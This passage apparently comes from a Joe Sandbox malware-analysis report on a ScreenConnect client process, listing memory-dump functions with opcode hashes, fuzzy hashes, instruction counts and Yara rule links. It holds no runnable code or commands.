Opcode ID: 5a0f0369f480fe2fc8e60cfe870769737730abac6df7e83b92ce41af057f32e7
Instruction ID: 2d1babe292b48f1d40b0ef7b016ee5693d1c2dbf4b4b9fda0c85070702287836
Opcode Fuzzy Hash: 5a0f0369f480fe2fc8e60cfe870769737730abac6df7e83b92ce41af057f32e7
Instruction Fuzzy Hash: A2E086318047489FC701BF68D459499FBB4EE95200B05C69AE88D5B113FB70D595D782

Function 01F65988 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2269570bdbddf6217334afd51f1c828b3c5e005687214d4223eb459cd69165a5
Instruction ID: c1c1571d2998c937a6f67c5284183d1372b6d3bae1de82b4dd3ba298ffcacaa6
Opcode Fuzzy Hash: 2269570bdbddf6217334afd51f1c828b3c5e005687214d4223eb459cd69165a5
Instruction Fuzzy Hash: 19D01271901108EFCB04EFA8E94095DB7F5EB45305B108599D908D3304DA316F049B51

Function 01F6ED38 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e02108b9ca650668ad5ee6ac2178054db7a92e01c73fdf7da980b5851e49c2d5
Instruction ID: b7867f2f98a6134b1b1b45820ed6a05fa4db226442fbff4680339264ea96d991
Opcode Fuzzy Hash: e02108b9ca650668ad5ee6ac2178054db7a92e01c73fdf7da980b5851e49c2d5
Instruction Fuzzy Hash: E8D0C73181470D9DC700BB78D454469F778EED5200F00D65AE44D57111FF70D6D0D681

Function 01F6DF08 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfe967035c4bb6032030ef13254c822f0ff93e0fc8929af2aa5e22f324c5a98
Instruction ID: d74f871abe74d25de221bb565f8a79810eeed3a931e3140bf9c058ae5bba08ed
Opcode Fuzzy Hash: dbfe967035c4bb6032030ef13254c822f0ff93e0fc8929af2aa5e22f324c5a98
Instruction Fuzzy Hash: 4FD0172200E3C86FDF13CFA9A1A05943FB0A903220308E48AC444D6466D1798545CF22

Function 01F6E660 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2932927209.0000000001F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f60000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08

Analysis Process: ScreenConnect.WindowsClient.exePID: 7620, Parent PID: 7544COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BBB5A21 Relevance: .6, Instructions: 623
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a1c4a5e6e3e3da179304f0ac84985920648cb56623d08a9696fdce8660deccc
Instruction ID: 4e75406bbca98298521467d188748bf806feff616ba5df4dfe097110682cb2e5
Opcode Fuzzy Hash: 0a1c4a5e6e3e3da179304f0ac84985920648cb56623d08a9696fdce8660deccc
Instruction Fuzzy Hash: AB127931B0EA5E4FE7799A6894B46B677C1FF44308F4501BAD45EC71E7DD28AC028741

Function 00007FFD9BBB6C7C Relevance: .6, Instructions: 563
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43cb0633917ad66f876aa5436a5939a86f0d97668d3b4023eaa3a8e98f045468
Instruction ID: 536872e151c09d134f0c86c6f112012b7873cc76483688b7a2f9f57d4a2341ec
Opcode Fuzzy Hash: 43cb0633917ad66f876aa5436a5939a86f0d97668d3b4023eaa3a8e98f045468
Instruction Fuzzy Hash: CA02C831B1ED2E4EEB7997A884746BA62D2FF98344F564079D04EC31E2DD28BE468740

Function 00007FFD9B8A8014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B8A8142

Memory Dump Source

Source File: 0000000C.00000002.2946153340.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b8a0000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 0b4a46091e9b7618eef3628c820fa4da3498744ba7d7a9cb9c3f3f101fd43bb3
Instruction ID: 2dc8b946b8dad94ab7a8d05c4d8fdee3b884bceb4378d4b60edbc0b42b4fa931
Opcode Fuzzy Hash: 0b4a46091e9b7618eef3628c820fa4da3498744ba7d7a9cb9c3f3f101fd43bb3
Instruction Fuzzy Hash: F241293190DB584FDB28AFA8984A5E97BE0EF59310F04417FE449C3192DF78A9468BA1

Function 00007FFD9BBB01F5 Relevance: .7, Instructions: 661
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f85eb699b4301354111ebd5aea5fd66259cab3a2e852d71a02fc40ca99b26ac
Instruction ID: d245b01384c879be1eb36db7dfdea82b8cfc175b82a9e6e8776bd112585ef58d
Opcode Fuzzy Hash: 1f85eb699b4301354111ebd5aea5fd66259cab3a2e852d71a02fc40ca99b26ac
Instruction Fuzzy Hash: 73125871B0EA5E0FE7A9E7AD84656B637D1FF58304F4540BAE44DC72E2ED28E9028700

Function 00007FFD9BBB5C34 Relevance: .4, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75aa3850d9ff3cdcfea678e6a26c11fe5076a0f2fdf2ccd1e608b3781bdc0edb
Instruction ID: 68a4522ba0a15ec6137286fd315b9102ea83617046a78eeb2dc78d121f290795
Opcode Fuzzy Hash: 75aa3850d9ff3cdcfea678e6a26c11fe5076a0f2fdf2ccd1e608b3781bdc0edb
Instruction Fuzzy Hash: 17B18C21B0EA5B4FEB6A976858B05B97781FF45308B0901BAD09DC71EBDD18EC068742

Function 00007FFD9BBB28A8 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b309ba2c44cc2ba4fe0595abe0b37cc933f1f6b8581780011d485f3739fbdc6
Instruction ID: 00bc0e7a6f1c962f3a69beaedfc65df0dc7e42fab4f56453e216b5e42ea7302a
Opcode Fuzzy Hash: 4b309ba2c44cc2ba4fe0595abe0b37cc933f1f6b8581780011d485f3739fbdc6
Instruction Fuzzy Hash: 33A1147270DA4A4FEBA8EE58D8659AA37D2FF94354B0401B9D44DC71E3DE25F802CB40

Function 00007FFD9BBB4C4C Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa7c06b20af456c763813ced300183db3fbd28d420e585ead68595d74d72c441
Instruction ID: ca2a2ee5a389c415fc3e613fdb6e480b14fcaa1ce19aa731197021acc7108562
Opcode Fuzzy Hash: fa7c06b20af456c763813ced300183db3fbd28d420e585ead68595d74d72c441
Instruction Fuzzy Hash: 4E91F932A1DA1E4BEF6CEA14C4A28B673D1FF64344B41053DD44A875E2EE35FA46CB81

Function 00007FFD9BBB3CEA Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2d04ec112546f5c37e7d0655f3cbb1b5eb34d9445a786e7944f157f5c4e737
Instruction ID: fb3128b60ed48b0dfb3d50c71b6241d181d9f01e86e15ff0eca078b7d2ec2948
Opcode Fuzzy Hash: 4d2d04ec112546f5c37e7d0655f3cbb1b5eb34d9445a786e7944f157f5c4e737
Instruction Fuzzy Hash: B091743470DA4A8FCBDDEF58C4A0AA177E2FF9930472445B9C059CB69BDA25E843CB40

Function 00007FFD9BBB0426 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a571200a5606ee22dc65909fd9c2685c1961031b80f771630c8ec9d29a9b7d6
Instruction ID: 44d6779c5021989f05210a03d40494701ec6dd7b6d52ffc9d82bb36dbf11bbd9
Opcode Fuzzy Hash: 8a571200a5606ee22dc65909fd9c2685c1961031b80f771630c8ec9d29a9b7d6
Instruction Fuzzy Hash: 9A71FE70719A1E8FEBB8EB59C4A1BB632D1FF58305F954078E44EC72E2DD64E9058B40

Function 00007FFD9BBB6DB7 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b746f7be9c290dd2326a9569ae38113817dcb9bbc88e15455138ae6bceb22721
Instruction ID: 507078c3adc69296a7464ea59af933c36301286c840e98b20424154fead27757
Opcode Fuzzy Hash: b746f7be9c290dd2326a9569ae38113817dcb9bbc88e15455138ae6bceb22721
Instruction Fuzzy Hash: 13715831F1A92F4AEB7597A584716FA62D2FF98348F564439D01EC21E2DD28FA428B40

Function 00007FFD9BBB11AF Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 994aed78f35b8c0e16bbd207106bbce5e68875dcdc41a4454b3ab62c5d0d5447
Instruction ID: c1e1a4d91f09bd337db98094ae2a313f2389c3862939abedb58c1e1588b4069f
Opcode Fuzzy Hash: 994aed78f35b8c0e16bbd207106bbce5e68875dcdc41a4454b3ab62c5d0d5447
Instruction Fuzzy Hash: 3651C553D0F6EA0FE7629A7C58754E67F60EF1366870A01F7C0988F0F3E95929468B41

Function 00007FFD9BBB125D Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556d4f077e00a0afa6a24fd9384d92c5097489c29cb4605a4a671dec0113d904
Instruction ID: 262accac9d4700abe6bcb0a9303bca4b7097a9c0971074cd588d5cff413c28e0
Opcode Fuzzy Hash: 556d4f077e00a0afa6a24fd9384d92c5097489c29cb4605a4a671dec0113d904
Instruction Fuzzy Hash: 8C41C36390F6EA0FE7629A7C58754E67F60EF1326870A01F7C0D48F0E3E9192946CB91

Function 00007FFD9BBB4B55 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ae1587486d653dffca0c95df1cf8d74ad371b78bbdffd690c4e9814e7434856
Instruction ID: b78f7ad5b664edbebe360f6a286c607bc27214b12ff5000d917b31ff0f9389a3
Opcode Fuzzy Hash: 5ae1587486d653dffca0c95df1cf8d74ad371b78bbdffd690c4e9814e7434856
Instruction Fuzzy Hash: 56315612B0FAAA0FE7B29A7C14A02767B91FF9575570A01FFC088C71E7ED14990A8741

Function 00007FFD9BBB7D9B Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e050a78586b83a52b48bc2039417349f99b8de06c48dc64266c2cf6d5dfd02da
Instruction ID: 397be40d590705730181460e96df1a0eb77d49b02702d441037b1a4c2a1a6384
Opcode Fuzzy Hash: e050a78586b83a52b48bc2039417349f99b8de06c48dc64266c2cf6d5dfd02da
Instruction Fuzzy Hash: 27319922B0EE9F0BEBA9ABB998715B67791FF14344B1100BED04DC30D3ED19AD068742

Function 00007FFD9BBB475C Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d27d580664dc04ba6d29133e41e0097433886c2f23b9877d89a2ed3d775b056
Instruction ID: d98d2f1acb0eec33b17ad702f71e1a749b58c414dc2448395ce1def950004578
Opcode Fuzzy Hash: 5d27d580664dc04ba6d29133e41e0097433886c2f23b9877d89a2ed3d775b056
Instruction Fuzzy Hash: 28315612F1EAAA0FE764A76C58656797BD1FF86314B1A41FDC098C30E6ED1868468342

Function 00007FFD9BBB81C8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c622e6eba6e80a2a109f92c732dbddc167ec27efeb246968006ea4f930b6833d
Instruction ID: 5bc2856be3fc66f728948b791af0dfb64aa75bc7e39beb1239a88cb78d72fa83
Opcode Fuzzy Hash: c622e6eba6e80a2a109f92c732dbddc167ec27efeb246968006ea4f930b6833d
Instruction Fuzzy Hash: D8310936B0ED5D8EEB64AA949C700DA77A1FF99308F050679E44CC31F2DB256902CB41

Function 00007FFD9BBB85EC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55188d4c2a2dc2c97b5dacafe26075e180ab8c4c4394fcf99fcec60a9e1f2757
Instruction ID: fb8e1ea141298e36d6b3c7c3ebb85dc746407f5446e15810f157804b898856f8
Opcode Fuzzy Hash: 55188d4c2a2dc2c97b5dacafe26075e180ab8c4c4394fcf99fcec60a9e1f2757
Instruction Fuzzy Hash: 8921E533F0ED6D4AEBA596A85C311EA3791FF44348F0505BFE55ED31E1DE25EA008A81

Function 00007FFD9BBB0125 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76ba678715ac71c0551cf24ecf55a575f1b3b45c6c9bf9a8a6f4bba8aa407faf
Instruction ID: 0c2df11f349478d10b54009414af8e65d929550def7375dfb426422e68bcf6da
Opcode Fuzzy Hash: 76ba678715ac71c0551cf24ecf55a575f1b3b45c6c9bf9a8a6f4bba8aa407faf
Instruction Fuzzy Hash: D4210631A0DE9D4FDBA8EB6888656BA77F1FF65304F4501ABE04DC31E2DE25A8068741

Function 00007FFD9BBB11E2 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672959fb4c4b16331dfe8d0da71f951c2df3ac8b1924d714533f57a024c8c6a8
Instruction ID: d8250f335e728015e19dd62b7d7d8105a5c1e319a30dbc4d918214a11ea4db72
Opcode Fuzzy Hash: 672959fb4c4b16331dfe8d0da71f951c2df3ac8b1924d714533f57a024c8c6a8
Instruction Fuzzy Hash: 45210862A0F66A5FD752AA6CA4B14E67B60EF1221870901B3D098CB0F3ED156946CB80

Function 00007FFD9BBB540D Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f5a4016b1f18f95345b22cd2153185efb8f3a579626864a5c7626e67512c1b4
Instruction ID: cad8e712a3cd32b978198f5a98f1fa06e9507bb355bc53b70eb9def8ec8780e0
Opcode Fuzzy Hash: 0f5a4016b1f18f95345b22cd2153185efb8f3a579626864a5c7626e67512c1b4
Instruction Fuzzy Hash: A211A872E0EA5C4FDF958F545CB21A93FA1FF55304F0505AAD15CD32F6DA256901CB02

Function 00007FFD9BBB27C0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3db1229a12485c2e7ef11ebcde7ab6fbb50f88baef3d67ec71684f260ea291e
Instruction ID: c8b3d1cae49b7de6594337c0f667eb037532b8dcdb2165345accbee0a96dac53
Opcode Fuzzy Hash: f3db1229a12485c2e7ef11ebcde7ab6fbb50f88baef3d67ec71684f260ea291e
Instruction Fuzzy Hash: 9711AF71B09E4A4FDB98DE58D8A4A6937D2FFA8714B0501BDD41EC72A2DE21FC42CB40

Function 00007FFD9BBB2A0C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db9758fdc914a992f0da390bc4ec60ac803e1c66f35cf91b247ce99f9c29423
Instruction ID: 71e1389aa36297a63e61111bff431b4445f27cf6cec12cd996f19fb16c7cfb7a
Opcode Fuzzy Hash: 4db9758fdc914a992f0da390bc4ec60ac803e1c66f35cf91b247ce99f9c29423
Instruction Fuzzy Hash: C411AF71B09A494FDBA8EF58C460A6A77A1FF68304B1541A8C44ECB2D7DE25E846CB80

Function 00007FFD9BBB2A75 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c1103b2ea6dc37c48060a67b102d7f231d7c7bcc689d46feadea4b7f05a810
Instruction ID: b9992556f45529859ae3e6a2b525aa570751ae99f5023c7f228493e827ba9561
Opcode Fuzzy Hash: d6c1103b2ea6dc37c48060a67b102d7f231d7c7bcc689d46feadea4b7f05a810
Instruction Fuzzy Hash: 2E11BB71B09A494FDB98EF58C460A6A77A2FF68304B0540A8C44ECB2D7DE25E846CB80

Function 00007FFD9BBB44F9 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4cfafac0cdf9e240ce7f8dbf9e23481caca64f8782c24ee5e6ffde70bfbfcec
Instruction ID: de80b6f2cfeb0398a0314c00cfe47ce124fe5ef3f8e2c62998111b4bdf8ea4a8
Opcode Fuzzy Hash: f4cfafac0cdf9e240ce7f8dbf9e23481caca64f8782c24ee5e6ffde70bfbfcec
Instruction Fuzzy Hash: 86112910F0EA5B0BF779936884B077626E1FF45304F4A40BEC40DC21E6DC2C9E858711

Function 00007FFD9BBB1008 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4fd6f38806a74c5a0d372ef7acf6d54dcc2f50f44e1b8c072dac6907a498228
Instruction ID: b122b474358c62db95b1332d8e98ea2b98c3c4bb79bc95a4aff578af9eec83d9
Opcode Fuzzy Hash: e4fd6f38806a74c5a0d372ef7acf6d54dcc2f50f44e1b8c072dac6907a498228
Instruction Fuzzy Hash: 2D012D51B1AE1E0BFB98AB6D14E55B756D2FFE43847554079D00DC31DADC2CE9414740

Function 00007FFD9BBB4ECC Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9645384c6ab4b6ec4b82dd1c788c3bf7b4fb9e11d9bf8328c4fa490d18543ff
Instruction ID: a2bfd2afd274dcb7326ae54180ae12627b8ed4ccb6ed313d871ff94755fd28ac
Opcode Fuzzy Hash: c9645384c6ab4b6ec4b82dd1c788c3bf7b4fb9e11d9bf8328c4fa490d18543ff
Instruction Fuzzy Hash: 44014552B1EE5E0BFB98EBAD14E55B2A6D2FBA428475540B9C00CC31DBEC2CEA814740

Function 00007FFD9BBB3F70 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea2becba4068b9bdc3319d64a5229b0a6250b014036fb29d71300a697097f351
Instruction ID: f6ad01d9ca3986ff2c8c653ed75644aa6565e9f36ffc4cf64de2feeeceb5da75
Opcode Fuzzy Hash: ea2becba4068b9bdc3319d64a5229b0a6250b014036fb29d71300a697097f351
Instruction Fuzzy Hash: 5601DB11B0FA9E05EEB613A815341F927A1AF96225F4B00B7D84CC71E7CD4C5E864252

Function 00007FFD9BBB827A Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d740e7f9408bfc19fc7e15fed1bc27a1bb104ae707b53c7b7db2b6c3fd44e1b0
Instruction ID: 926cc150a0bb0e920d4e5d8cb650a8c286da0cfea4e0cb147b4f6d5c2b25399b
Opcode Fuzzy Hash: d740e7f9408bfc19fc7e15fed1bc27a1bb104ae707b53c7b7db2b6c3fd44e1b0
Instruction Fuzzy Hash: EB01D63654EBD84FE76316B19C245823FB4FF87218B0A01EBE488CB0A3D66D5916C722

Function 00007FFD9BBB0905 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301cf39c41cd2f64e4638123c98006d457b71234005283b98417ba1a390596df
Instruction ID: aa35bf2beb9180f6e5112bb1862237452390c439e7a6de6ec0ad0c4bf8bf0652
Opcode Fuzzy Hash: 301cf39c41cd2f64e4638123c98006d457b71234005283b98417ba1a390596df
Instruction Fuzzy Hash: B9F0622144E6D60FD36697F488656E47FF0EF8B220B0E41FBD484CB5A3D50C59868361

Function 00007FFD9BBB13F5 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2953376145.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd89c83ce792fc2ec8216061f4d5c1fd05064a4dd641ed487f1652816eadaaee
Instruction ID: 8c5585fccf0e7507fda7fa8c94b4868d7b5976f7e0c0d6415e17a237202f909f
Opcode Fuzzy Hash: dd89c83ce792fc2ec8216061f4d5c1fd05064a4dd641ed487f1652816eadaaee
